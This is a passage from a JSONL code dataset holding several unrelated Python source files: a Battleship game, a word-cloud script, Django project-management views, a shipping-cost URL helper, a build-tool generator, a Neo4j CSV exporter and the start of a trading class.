show_board(board):\n for row in board:\n print(\" \".join(row))\n\ndef test_coord(coord):\n x,y=coord\n if x not in range(settings[\"rang\"]) or y not in range(settings[\"rang\"]):\n return False\n elif real_board[y][x]==\"X\":\n return False\n else:\n return True\n\ndef random_coord():\n x,y=-1,-1\n while test_coord([x,y])==False:\n x=random.randint(0,settings[\"rang\"]-1)\n y=random.randint(0,settings[\"rang\"]-1)\n return x,y\n \ndef random_direction():\n return random.randint(0,3)\n \ndef ship_extension(x,y,direction,magnitude):\n if direction==0:\n return x+magnitude,y\n if direction==1:\n return x,y+magnitude\n if direction==2:\n return x-magnitude,y\n if direction==3:\n return x,y-magnitude\n\ndef bulk_test_coord(x,y):\n if not len(x)==len(y):\n print(\"Error within the program.\")\n else:\n for coord in range(len(x)):\n if test_coord([x[coord],y[coord]])==False:\n return False\n break\n else:\n return True\n\ndef plot_points(x,y,designation):\n if not len(x)==len(y):\n print(\"Error within the program.\")\n else:\n for point_number in range(len(x)):\n real_board[y[point_number]][x[point_number]]=designation\n\ndef plot_points2(coords):\n for coord in coords:\n x,y=coord\n board[y][x]=\"/\"\n\ndef create_fake_coord_list(amount):\n x=[]\n y=[]\n for coord in range(amount):\n x.append(-1)\n y.append(-1)\n return x,y\n\ndef create_coord_list(x,y):\n if not len(x)==len(y):\n print(\"Error within the program.\")\n else:\n coords=[]\n for coord in range(len(x)):\n coords.append([x[coord],y[coord]])\n return coords\n\nboard=[]\nreal_board=[]\n\nfor row in range(settings[\"rang\"]):\n board.append(['O']*settings[\"rang\"])\n real_board.append(['O']*settings[\"rang\"]) \n\nif player_amount==1:\n for l1battleship in range(settings[\"l1amount\"]):\n x,y=random_coord()\n ship_dict.append({\"condition\":\"alive\",\"size\":1,\"coords\":[[x,y]]})\n real_board[y][x]=\"X\"\n\n for l2battleship in range(settings[\"l2amount\"]):\n x,y=create_fake_coord_list(2)\n while bulk_test_coord(x,y)==False:\n x[0],y[0]=random_coord()\n direction=random_direction()\n x[1],y[1]=ship_extension(x[0],y[0],direction,1)\n ship_dict.append({\"condition\":\"alive\",\"size\":2,\"coords\":create_coord_list(x,y)})\n plot_points(x,y,\"X\")\n\n for l3battleship in range(settings[\"l3amount\"]):\n x,y=create_fake_coord_list(3)\n while bulk_test_coord(x,y)==False:\n x[0],y[0]=random_coord()\n direction=random_direction()\n x[1],y[1]=ship_extension(x[0],y[0],direction,1)\n x[2],y[2]=ship_extension(x[0],y[0],direction,2)\n ship_dict.append({\"condition\":\"alive\",\"size\":3,\"coords\":create_coord_list(x,y)})\n plot_points(x,y,\"X\")\n\n#Game Start\ndef guess(variable,rang):\n coord=int_create(input(\"Which {}: \".format(variable)))-1\n while coord not in range(rang):\n coord=int_create(input(\"Invalid number, must be within the range of 1 and {}: \".format(rang)))-1\n return coord\n \ndef win_check(real_board):\n win=True\n for row in real_board:\n for col in row:\n if col==\"X\":\n win=False\n return win\n \ndef ship_check(real_board,ship_dict):\n for ship in ship_dict:\n if ship['condition']==\"alive\":\n for coord in range(len(ship[\"coords\"])):\n x,y=ship[\"coords\"][coord]\n if real_board[y][x]==\"X\":\n break\n else:\n ship['condition']='dead'\n plot_points2(ship[\"coords\"])\n print(\"You sank a battleship!\")\n \nturn_counter=0\nwhile True:\n turn_counter+=1\n show_board(board)\n row_guess,col_guess=guess(\"row\",settings[\"rang\"]),guess(\"column\",settings[\"rang\"])\n while board[row_guess][col_guess]==\"\\\\\" or board[row_guess][col_guess]==\"X\" or board[row_guess][col_guess]==\"/\":\n print(\"You've already tried this spot.\")\n row_guess,col_guess=guess(\"row\",settings[\"rang\"]),guess(\"column\",settings[\"rang\"])\n if real_board[row_guess][col_guess]==\"X\":\n board[row_guess][col_guess]=\"\\\\\"\n real_board[row_guess][col_guess]=\"Y\"\n print(\"You've hit a battleship\")\n ship_check(real_board,ship_dict)\n if win_check(real_board)==True:\n break\n else:\n board[row_guess][col_guess]=\"X\"\n print(\"You missed.\")\nprint(\"Congratulations, you won!\")\nprint(\"Your victory took {} turns.\".format(turn_counter))\n \n \n \n \n","sub_path":"simple battleship.py","file_name":"simple battleship.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"455902697","text":"# -*- coding: utf-8 -*-\n'''\n通过jieba提取的词生成云图\n'''\nimport jieba.analyse\nimport numpy as np\nfrom PIL import Image\nfrom wordcloud import WordCloud\nimport codecs\npath = 'data/十一/'\nOUT_FILE_NAME = (path+'her_words_out.txt', path+'my_words_out.txt')\nOUT_IMG_NAME = (path+'her_wordcloud.png', path+'my_wordcloud.png')\nSHAPE_IMG_NAME = (path+'辉.png', path+'十一.png')\nSTOP_WORDS = [u'图片', u'表情', u'窗口', u'抖动', u'哈哈', u'嘻嘻', u'啊啊啊', u'哈哈哈']\nALTER_WORDS = {u'被替换词1':u'替换词1',u'被替换词2':u'替换词2'}\n\ndef make_wordcould(in_files, out_files, shape_files):\n \"\"\"make wordcould\"\"\"\n for in_file, out_file, shape_file in zip(in_files, out_files, shape_files):\n shape = np.array(Image.open(shape_file))\n content = codecs.open(in_file, 'r', encoding='utf-8').read()\n tags = jieba.analyse.extract_tags(content, topK=120, withWeight=True)\n text = {}\n for word, freq in tags:\n if word not in STOP_WORDS:\n if word in ALTER_WORDS:\n word = ALTER_WORDS[word]\n text[word] = freq\n # for word, freq in tags:\n # text[word] = freq\n print(text)\n wordcloud = WordCloud(background_color='white', font_path='FZYTK.TTF', mask=shape, width=1080, height=720).generate_from_frequencies(text)\n wordcloud.to_file(out_file)\n\nif __name__ == '__main__':\n make_wordcould(OUT_FILE_NAME, OUT_IMG_NAME, SHAPE_IMG_NAME)\n","sub_path":"chat_content_process/3.wordcloud_words.py","file_name":"3.wordcloud_words.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"179056159","text":"# coding:utf-8\n\nimport copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage import measure, io\n\n\ndef adjunction_image(image):\n row, col = image.shape\n ad_image = np.zeros((row + 2, col + 2))\n for i in range(row):\n for j in range(col):\n ad_image[i + 1][j + 1] = image[i][j]\n return ad_image\n\n\ndef adjunction_image_min(image):\n row, col = image.shape\n ad_image = np.zeros((row - 2, col - 2))\n for i in range(1, row - 1, 1):\n for j in range(1, col - 1, 1):\n ad_image[i - 1][j - 1] = image[i][j]\n return ad_image\n\n\ndef fff():\n img_ori = io.imread(\"./Test_Img/chos lugs-pan chen blo chos kyi rgyal mtshan gsung 'bum-1-0002_1_369.png\",\n as_grey=True)\n img_ori = adjunction_image(img_ori)\n img = np.where((copy.copy(img_ori)) > 245, 0, 1)\n lab_img = measure.label(img)\n regions = measure.regionprops(lab_img)\n for region in regions:\n if region.label != 1:\n area = region.coords\n for i in range(len(area)):\n row, col = area[i][0], area[i][1]\n img_ori[row][col] = 255\n p1 = plt.subplot(211)\n p1.imshow(adjunction_image_min(lab_img), cmap='gray')\n\n p2 = plt.subplot(212)\n p2.imshow(adjunction_image_min(img_ori), cmap='gray')\n plt.show()\n\n\nimport time\n\nnowtime = time.time()\ntime.sleep(1)\nprint(time.strftime('%M-%S', time.localtime(time.time() - nowtime)))\n\ns = np.arange(0, 32, 2)\nprint(len(s))\n","sub_path":"Corner/my/tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"93724639","text":"from django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.core.paginator import Paginator,InvalidPage, EmptyPage\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom milestones.models import Milestone\nfrom milestones import *\nfrom tasks.models import Tasks\nfrom client.models import Client\nfrom forms import *\nfrom projects.models import *\nfrom django.core.context_processors import csrf\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.template.defaultfilters import slugify\nfrom django.db import IntegrityError\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import *\nfrom documents.models import *\nfrom django.contrib.comments import Comment\nfrom mastermodule.models import *\nfrom django.contrib.sites.models import Site\n# Create your views here.\n\n\ndef view(request, id_disp):\n# disp = request.GET.get('id')\n mil_obj = Milestone.objects.get(id=id_disp)\n #tk = Tasks.objects.get(id=id_disp)\n tasks = Tasks.objects.filter(milestone=mil_obj)\n\n documents = Milestone_Document.objects.all()\n return render(request, \"milestones/milestone_view.html\", locals())\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef milestone_view(request, id_disp):\n todays = datetime.date.today()\n mil_obj = Milestone.objects.get(id=(id_disp))\n cont_type = ContentType.objects.get_for_model(mil_obj)\n news_feed = Recently_Viewed.objects.create(user = request.user, content_type = cont_type, object_id = mil_obj.id,)\n task_list = Tasks.objects.filter(milestone = mil_obj).order_by('id')\n #task_list = Tasks.objects.all()\n #documents = Document.objects.filter(milestone = mil_obj)\n #docs = Document.objects.filter(content_type = content_type, objects_id = mil_obj.id )\n #cont_type = ContentType.objects.get_for_model(mil_obj)\n #comment = Comment.objects.filter(content_type = cont_type, object_pk = mil_obj.id, is_public = True)\n content_type = ContentType.objects.get_for_model(mil_obj)\n comment = Comment.objects.filter(content_type = content_type, \\\n object_pk = mil_obj.pk, is_public = True)\n# doc = Document.objects.filter(content_type = content_type, objects_id = mil_obj.pk )\n\n return render(request, \"milestones/milestone_view.html\", locals())\n\n\n@login_required(login_url=\"/login/\")\ndef wide_view(request):\n wid = Milestone.objects.all()\n widtask = Tasks.objects.all()\n return render(request, \"milestones/wide_view.html\", locals())\n\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef overdueview(request):\n peoples = UserProfile.objects.all()\n todays = datetime.date.today()\n overdue_list = Milestone.objects.filter(due_date__lt=todays, status=False, owned_by__user=request.user)\n return _filter_function(request, overdue_list)\n\n\n@login_required(login_url=\"/login/\")\ndef addmilestone(request, task=None, id=None):\n f = Milestone_Form(request.user.pk)\n form = f\n error = ''\n todays = datetime.date.today()+timedelta(days=7)\n msg = ''\n nam = ''\n x = ''\n f = ''\n user_id=request.user.id\n user_id2 = UserProfile.objects.get(user__id=user_id)\n if task == 'add':\n if request.method == 'POST':\n form = form(request.POST)\n client_id = request.POST.get('client')\n project_id = request.POST.get('project')\n available_task = request.POST.getlist('available_task')\n name = request.POST.get('name', '')\n if form.is_valid():\n f = form.save(commit=False)\n f.slug=name\n if client_id:\n client_obj = Client.objects.get(pk=client_id)\n f.client = client_obj\n #f.save()\n if project_id:\n project_obj = Project.objects.get(pk=project_id)\n f.project = project_obj\n f.save()\n if available_task:\n for i in available_task:\n f.available_task.remove(i)\n for i in available_task:\n f.available_task.add(i)\n f.save()\n msg = \"successfully saved\"\n return HttpResponseRedirect(\"/milestones/\")\n else:\n error = \"form error\"\n msg = \"Please check the particulars\"\n elif task == \"edit\":\n id_edit = id\n msg = ''\n #todays = datetime.date.today()+timedelta(days=7)\n mile = Milestone.objects.get(id=id_edit)\n f = Milestone_Form(request.user.pk)\n form = f(instance=mile)\n if request.POST:\n form = f(request.POST, instance=mile)\n available_task = request.POST.getlist('available_task', '')\n if form.is_valid():\n f = form.save(commit=False)\n #if not Milestone.objects.filter(title = request.POST.get\\\n #('title')).exclude(id=mile.id).exists():\n client_id = request.POST.get('client','')\n if client_id:\n client_obj = Client.objects.get(pk=client_id)\n f.client = client_obj\n project_id = request.POST.get('project','')\n if project_id:\n project_obj = Project.objects.get(pk=project_id)\n f.project = project_obj\n f.save()\n if available_task:\n for i in available_task:\n f.available_task.remove(i)\n for i in available_task:\n f.available_task.add(i)\n f.save()\n edit_done = True\n msg = \"edited successfully\"\n success = True\n return HttpResponseRedirect(\"/milestones/\")\n else:\n msg='Invalid form'\n return render(request, \"milestones/milestone-add.html\", locals(), \n context_instance = RequestContext(request))\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef _filter_function(request, milestone_list):\n todays = datetime.date.today()\n #milestone_list = Milestone.objects.filter(owned_by__user=request.user)\n task = Tasks.objects.all()\n project_list=Project.objects.all()\n clients=Client.objects.all()\n peoples = UserProfile.objects.all()\n milestone = Milestone.objects.all()\n client_id = request.GET.get('client', '')\n project_id = request.GET.get('projects', '')\n owned_by_id = request.GET.get('owners', '')\n milestone_id = request.GET.get('milestones', '')\n title = request.GET.get('milestone-title', '')\n status = request.GET.get('status', '')\n if client_id:\n client_obj = Client.objects.filter(id=client_id)\n milestone_list = milestone_list.filter(client=client_obj)\n if project_id:\n milestone_list= milestone_list.filter(project__id=project_id)\n if owned_by_id:\n milestone_list = milestone_list.filter(owned_by__id=owned_by_id)\n if status:\n todays = datetime.date.today()\n if status == 'Overdue':\n milestone_list = milestone_list.filter(due_date__lt=todays, status=False)\n elif status == 'Complete':\n milestone_list = milestone_list.filter(status=True)\n elif status == 'In Progress':\n milestone_list = milestone_list.filter(status=False).exclude(due_date__lt=todays)\n if milestone_id:\n milestone_list = milestone_list.filter(milestone__id=milestone_id)\n if title:\n milestone_list = milestone_list.filter(title__icontains=title)\n milestoness=milestone_list\n return render(request, \"milestones/milestone-home.html\", locals())\n\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef mile(request):\n for i in request.user.userprofile_set.all():\n if i.access_level == '1':\n return _filter_function(request, Milestone.objects.all())\n return milestone_owned_by(request)\n\n\n'''@login_required(login_url=\"/login/\")\ndef editmilestone(request, id_edit):\n msg = ''\n #todays = datetime.date.today()+timedelta(days=7)\n mile = Milestone.objects.get(id=id_edit)\n form = MilestoneForm(instance = mile)\n if request.POST:\n form = MilestoneForm(request.POST, instance = mile)\n if form.is_valid():\n f = form.save(commit=False)\n if not Milestone.objects.filter(title = request.POST.get('title')).exclude(id=mile.id).exists():\n f.save()\n edit_done = True\n msg = \"edited successfully\"\n success = True\n return HttpResponseRedirect(\"/milestones/\")\n else:\n msg = \"Already Exists!!\"\n print msg,'msg'\n else:\n msg='Invalid form'\n return render(request,\"milestones/milestone-add.html\",locals())\n'''\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef milestone_owned_by(request):\n\n milestone_list = Milestone.objects.filter(owned_by__user=request.user)\n return _filter_function(request, milestone_list)\n\n\n@login_required(login_url=\"/login/\")\ndef milestone_documents(request):\n documents = Milestone_Document.objects.all()\n return render(request, \"milestones/milestone-home.html\", locals())\n\n\n@login_required(login_url=\"/login/\")\ndef addmilestonedocument(request):\n form = Milestone_DocumentForm()\n error = ''\n msg = ''\n nam = ''\n x = ''\n f = ''\n if request.method == 'POST':\n form = Milestone_DocumentForm(request.POST, request.FILES)\n files = request.POST.get('files')\n if form.is_valid():\n f = form.save(commit=False)\n f.save()\n msg = \"successfully saved\"\n return HttpResponseRedirect(\"/milestones/\")\n else:\n error = \"form error\"\n msg = \"invaid\"\n \n return render(request, \"milestones/milestonedocument.html\", \\\n locals(), context_instance = RequestContext(request))\n\n@login_required(login_url=\"/login/\")\ndef editmilestonedocument(request, id_edit):\n msg = ''\n doc = Milestone_Document.objects.get(id=id_edit)\n form = Milestone_DocumentForm(instance = doc)\n files = request.POST.get('files')\n if request.POST:\n form = Milestone_DocumentForm(request.POST, instance = doc)\n if form.is_valid():\n f = form.save(commit=False)\n if not Milestone_Document.objects.filter(files = request.POST.get('files')).exclude(id=doc.id).exists():\n f.save()\n edit_done = True\n msg = \"edited successfully\"\n success = True\n return HttpResponseRedirect(\"/milestones/\")\n else:\n msg = \"Already Exists!!\"\n else:\n msg='Invalid form'\n return render(request, \"milestones/milestonedocument.html\", locals())\n\n\n@login_required(login_url=\"/login/\")\ndef activemilestones(request, id_active):\n milestone_obj = Milestone.objects.get(id=id_active)\n milestone_obj.activate = 2\n milestone_obj.save()\n success = True\n msg = \"Milestone Deactivated Successfully\"\n return HttpResponseRedirect(\"/milestones/\")\n\n\n\n@login_required(login_url=\"/login/\")\ndef deletemilestones(request, id_delete):\n milestone_obj = Milestone.objects.get(id=id_delete)\n milestone_obj.activate = 0\n milestone_obj.save()\n success = True\n msg = \"Milestone Deactivated Successfully\"\n return HttpResponseRedirect(\"/milestones/\")\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef gettasks(request):\n result={}\n cid = request.GET.get('cid')\n if cid:\n client_obj = Client.objects.get(id=cid)\n project_obj =Project.objects.filter(client=client_obj).values('id','name')\n result['res'] = list(project_obj)\n return HttpResponse(json.dumps(result),mimetype = \"application/json\")\n\n\n@login_required(login_url = \"/login/\")\ndef gettasks_list(request):\n result = {}\n mid = request.GET.get('mid')\n if mid:\n tasks_obj = Tasks.objects.filter(project__id = mid).values('id','title')\n #Tasks.objects.filter(owned_by__user__id=id)\n result['res'] = list(tasks_obj)\n return HttpResponse(json.dumps(result), mimetype = \"application/json\")\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef getpeople(request):\n result={}\n pid = request.GET.get('pid')\n if pid:\n project_obj = Project.objects.get(id=pid)\n userprofile_obj =UserProfile.objects.filter(project=project_obj).values('id','first_name','last_name')\n result['res'] = list(userprofile_obj)\n return HttpResponse(json.dumps(result), mimetype = \"application/json\")\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef getstatus(request):\n result={}\n rid = request.GET.get('rid')\n if rid:\n employee_obj = Employee.objects.get(id=rid)\n milestone_obj = Milestone.objects.filter(employee=employee_obj).values('id','status')\n result['res'] = list(milestone_obj)\n return HttpResponse(json.dumps(result),mimetype = 'application/json')\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef getmilestones(request):\n result={}\n sid = request.GET.get('sid')\n if sid:\n milestone_obj =Milestone.objects.get(id=sid)\n milestones_obj =Milestone.objects.filter(milestone=milestone_obj).values('id','status')\n result['res'] = list(milestones_obj)\n return HttpResponse(json.dumps(result), mimetype = \"application/json\")\n\n\n\n@login_required(login_url=\"/login/\")\ndef import_data_m(request):\n key = request.GET.get('key')\n if request.method == \"POST\":\n csvfile = ''\n data_file = request.FILES.get('data_file')\n if key == \"milestones\":\n if data_file:\n csvfile = CSVFiles.objects.create(upload_file=data_file)\n csv_path = ('/home/mahadev/Desktop/pms/static/') + str(csvfile.upload_file)\n reader=csv.reader(open(csv_path,'rb'), delimiter=';')\n fields=reader.next()\n for i,item in enumerate(reader):\n items = zip(fields,item)\n row = {}\n for (name,value) in items:\n row[name]=value.strip()\n pl = Project()\n for x,y in row.items():\n setattr(pl, x, y)\n pl.save()\n msg_upload = \"Uploaded Successfully..\"\n return render(request, 'milestones/import-milestones.html', locals())\n\n\n\ndef search(request):\n try:\n q = request.GET['q']\n posts = Milestone.objects.filter(title__search=q)\n return render_to_response('milestones/index.html', locals())\n except KeyError:\n return render_to_response('milestones/index-home.html')\n\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef od(request):\n milestone_list = Milestone.objects.all()\n due_dates = milestone_list[0].due_date\n todays = datetime.date.today()\n return render(request,\"milestones/od.html\", locals(), context_instance = RequestContext(request))\n\n\ndef milestone_comment(request):\n success, msg, user, response = False, '', request.user, {}\n try:\n if request.method == 'POST':\n tid, val = request.POST.get('mid'), request.POST.get('val')\n if tid and val:\n milestone = Milestone.objects.get(pk = int(tid))\n content_type = ContentType.objects.get_for_model(milestone)\n site = Site.objects.get(pk = 1)\n comment = Comment.objects.create(content_type = content_type, \\\n object_pk = milestone.pk, comment = val, user = user, site = site)\n success, msg = True, \"Commented successfully.\"\n else:\n msg = \"Invalid Data\"\n else:\n msg = \"Error Ocured\"\n except Exception as e:\n msg = e.message\n response = {'success':success, 'msg':msg}\n return HttpResponse(json.dumps(response), mimetype=\"application/json\")\n\n\n\n","sub_path":"milestones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"529146602","text":"from .models import Carrinho\n\ndef calcular_frete(cep_destino, cep_origem='14407000', peso='2', tipo_frete='04014',\n altura='10', largura='20', comprimento='20'):\n url = 'http://ws.correios.com.br/calculador/CalcPrecoPrazo.aspx?'\n url += '&nCdEmpresa='\n url += '&sDsSenha='\n url += '&nCdServico=' + tipo_frete\n url += '&sCepOrigem=' + cep_origem\n url += '&sCepDestino=' + cep_destino\n url += '&nVlPeso=' + peso\n url += '&nCdFormato=1'\n url += '&nVlComprimento=' + comprimento\n url += '&nVlAltura=' + altura\n url += '&nVlLargura=' + largura\n url += '&nVlDiametro=0'\n url += '&sCdMaoPropria=n'\n url += '&nVlValorDeclarado=0'\n url += '&sCdAvisoRecebimento=n'\n url += '&StrRetorno=xml'\n url += '&nIndicaCalculo=3'\n\n return (url)\n\n\ndef prazo_maior_ano(request):\n if request.user.is_authenticated():\n carrinho = Carrinho.objects.filter(dono=request.user)\n if carrinho:\n lista_prazo = []\n for i in carrinho:\n lista_prazo.append(i.prazo)\n\n return (int(max(lista_prazo)))\n else:\n return (0)\n\n else:\n key = request.session.session_key\n\n carrinho = Carrinho.objects.filter(dono_ano=key).order_by('data_adc')\n if carrinho:\n lista_prazo = []\n for i in carrinho:\n lista_prazo.append(i.prazo)\n\n return (int(max(lista_prazo)))\n\n else:\n return (0)","sub_path":"oticas/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"172313658","text":"# vim: set ts=8 sts=2 sw=2 tw=99 et:\n#\n# This file is part of AMBuild.\n#\n# AMBuild is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# AMBuild is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with AMBuild. If not, see .\nimport ambuild2.frontend.vs.gen as vs_gen\nfrom ambuild2.frontend.v2_1.vs import cxx\n\nclass Generator(vs_gen.Generator):\n def __init__(self, cm):\n super(Generator, self).__init__(cm)\n\n # Overridden.\n def detectCompilers(self, options):\n if not self.compiler:\n version = cxx.Compiler.GetVersionFromVS(self.vs_version)\n vendor = cxx.VisualStudio(version)\n self.base_compiler = cxx.Compiler(vendor)\n self.compiler = self.base_compiler.clone()\n return self.compiler\n","sub_path":"ambuild2/frontend/v2_1/vs/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"531901943","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport os\nimport re\nimport os.path\n\nimport csv\nfrom unicodecsv import writer\nfrom tqdm import tqdm\nfrom neomodel import StringProperty, BooleanProperty, IntegerProperty, FloatProperty\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom core.models import (\n Person,\n Company,\n Country,\n Person2Person,\n Company2Company,\n Person2Company,\n Company2Country,\n Person2Country,\n)\n\n\nfrom core.neo_models import (\n Person as NeoPerson,\n Company as NeoCompany,\n Country as NeoCountry,\n Company2Company as NeoCompany2Company,\n Person2Company as NeoPerson2Company,\n Person2Person as NeoPerson2Person,\n)\n\n\nclass Command(BaseCommand):\n neomodel_to_types_mapping = {\n IntegerProperty: \"INT\",\n StringProperty: \"STRING\",\n BooleanProperty: \"BOOLEAN\",\n FloatProperty: \"FLOAT\",\n }\n\n def add_arguments(self, parser):\n parser.add_argument(\"output_dir\", help=\"Directory to export CSVs\")\n\n def norm_str(self, s):\n if isinstance(s, bool):\n return \"true\" if s else \"false\"\n\n return re.sub(\"\\s+\", \" \", unicode(s).replace(\"\\n\", \" \").strip())\n\n def get_field_types(self, neo_model):\n field_types = {}\n\n if neo_model is not None:\n for prop, cls in neo_model.defined_properties().items():\n field_types[prop] = self.neomodel_to_types_mapping.get(\n type(cls), \"string\"\n )\n\n return field_types\n\n def export_nodes(self, fname, qs, neo_model=None, labels=[]):\n field_types = self.get_field_types(neo_model)\n\n self.nodes.append(os.path.basename(fname))\n with open(fname, \"w\") as fp:\n w = writer(fp, quoting=csv.QUOTE_ALL)\n id_fields = \"%sId:ID(%s)\" % (qs.model.__name__.lower(), qs.model.__name__)\n\n first = qs.first()\n fields = list(first.get_node()[\"data\"].keys())\n\n w.writerow(\n [id_fields]\n + list(\"{}:{}\".format(k, field_types.get(k, \"STRING\")) for k in fields)\n + [\":LABEL\"]\n )\n\n for obj in tqdm(qs.iterator(), total=qs.count()):\n row = [obj.pk]\n node_info = obj.get_node()[\"data\"]\n\n row += [self.norm_str(node_info[f]) for f in fields]\n\n row.append(\";\".join(labels))\n w.writerow(row)\n\n def export_relations(self, fname, qs, src, dst, neo_model=None):\n field_types = self.get_field_types(neo_model)\n\n self.relationships.append(os.path.basename(fname))\n\n with open(fname, \"w\") as fp:\n w = writer(fp, quoting=csv.QUOTE_ALL)\n if_fld_from = getattr(qs.model, src).field.related_model.__name__\n if_fld_to = getattr(qs.model, dst).field.related_model.__name__\n\n first = qs.first()\n fields = list(first.get_node()[\"data\"].keys())\n\n w.writerow(\n [\":START_ID(%s)\" % if_fld_from, \":END_ID(%s)\" % if_fld_to, \":TYPE\"]\n + list(\"{}:{}\".format(k, field_types.get(k, \"STRING\")) for k in fields)\n )\n\n for obj in tqdm(qs.iterator(), total=qs.count()):\n row = [\n getattr(obj, src + \"_id\"),\n getattr(obj, dst + \"_id\"),\n qs.model.__name__,\n ]\n\n node_info = obj.get_node()[\"data\"]\n\n row += [self.norm_str(node_info[f]) for f in fields]\n\n w.writerow(row)\n\n def handle(self, *args, **options):\n output_dir = options[\"output_dir\"]\n self.relationships = []\n self.nodes = []\n\n try:\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n except OSError:\n raise CommandError(\"Cannot create output dir\")\n\n self.export_nodes(\n os.path.join(output_dir, \"persons.csv\"),\n Person.objects.all().nocache(),\n neo_model=NeoPerson,\n labels=[\"Person\"],\n )\n\n self.export_nodes(\n os.path.join(output_dir, \"companies.csv\"),\n Company.objects.all().nocache(),\n neo_model=NeoCompany,\n labels=[\"Company\"],\n )\n\n self.export_nodes(\n os.path.join(output_dir, \"countries.csv\"),\n Country.objects.exclude(iso2=\"\").nocache(),\n neo_model=NeoCountry,\n labels=[\"Country\"],\n )\n\n self.export_relations(\n os.path.join(output_dir, \"person2person.csv\"),\n Person2Person.objects.all().nocache(),\n \"from_person\",\n \"to_person\",\n neo_model=NeoPerson2Person,\n )\n\n self.export_relations(\n os.path.join(output_dir, \"person2company.csv\"),\n Person2Company.objects.all().nocache(),\n \"from_person\",\n \"to_company\",\n neo_model=NeoPerson2Company,\n )\n\n self.export_relations(\n os.path.join(output_dir, \"company2company.csv\"),\n Company2Company.objects.all().nocache(),\n \"to_company\",\n \"from_company\",\n neo_model=NeoCompany2Company,\n )\n\n # self.export_relations(\n # os.path.join(output_dir, \"person2country.csv\"),\n # Person2Country.objects.all().nocache(),\n # \"from_person\",\n # \"to_country\",\n # [\n # \"relationship_type\",\n # \"date_established_human\",\n # \"date_finished_human\",\n # \"date_confirmed_human\",\n # \"proof_title\",\n # \"proof\",\n # ],\n # )\n\n # self.export_relations(\n # os.path.join(output_dir, \"company2country.csv\"),\n # Company2Country.objects.all().nocache(),\n # \"from_company\",\n # \"to_country\",\n # [\n # \"relationship_type\",\n # \"date_established_human\",\n # \"date_finished_human\",\n # \"date_confirmed_human\",\n # \"proof_title\",\n # \"proof\",\n # ],\n # )\n\n with open(os.path.join(output_dir, \"neo4j_import.sh\"), \"w\") as fp:\n cmd = \"{} import --id-type=INTEGER --database={} \\\\\\n\"\n fp.write(\n cmd.format(settings.NEO4J_ADMIN_PATH, settings.NEO4J_DATABASE_NAME)\n )\n fp.write(\"\\t--multiline-fields=true \\\\\\n\")\n\n for node in self.nodes:\n cmd = \"\\t--nodes={} \\\\\\n\"\n fp.write(cmd.format(node))\n\n for relationship in self.relationships:\n cmd = \"\\t--relationships={} \\\\\\n\"\n fp.write(cmd.format(relationship))\n","sub_path":"pepdb/core/management/commands/export_to_neo4j.py","file_name":"export_to_neo4j.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"469254002","text":"import warnings\n\nfrom quote import Quote\nfrom limit_order_book import LimitOrderBook\nfrom buy_sell import BuySell\n\n\nclass TradeSituation:\n # This variable will be incremented after each call of TradeSituation.generate_next_id().\n # It is used to populate __trade_situation_id.\n __common_trade_situation_id: int = 0\n # This is a global reference to the order book\n __common_order_book: LimitOrderBook\n # Instance attributes\n # Unique ID of the trade_situation\n __trade_situation_id: int\n # If True: it's a LONG (BUY) trade. If False: it's a SHORT (SELL) trade.\n __is_long_trade: bool\n # Quote saved when we opened the position\n __executed_open_quote: Quote\n # Reference quote when position opened.\n __arrived_open_quote: Quote\n # Quote saved when we close the position\n __executed_close_quote: Quote\n # Reference quote when position closed.\n __arrived_close_quote: Quote\n # Flag used to describe if the position is opened or closed\n __is_closed: bool\n # Maximum draw down in basis points. Always positive!\n __max_dd_in_bps: float\n # Latest profit or loss of the position in basis points\n __pnl_bps: float\n # Take profit in basis points\n __take_profit_in_bps: float\n # Trading amount\n __amount: float\n # This variable describes that we are using the best BID and best OFFER to calculate PnL\n __is_best_price_calculation: bool\n\n def __init__(self, open_order_arg: Quote, is_long_trade_arg: bool, take_profit_in_bps_arg: float, amount: float,\n is_best_px_calc: bool):\n # Init locals\n self.__max_dd_in_bps = 0.00\n self.__pnl_bps = 0.00\n self.__is_closed = True\n # Update and set the __trade_situation_id\n self.__trade_situation_id = 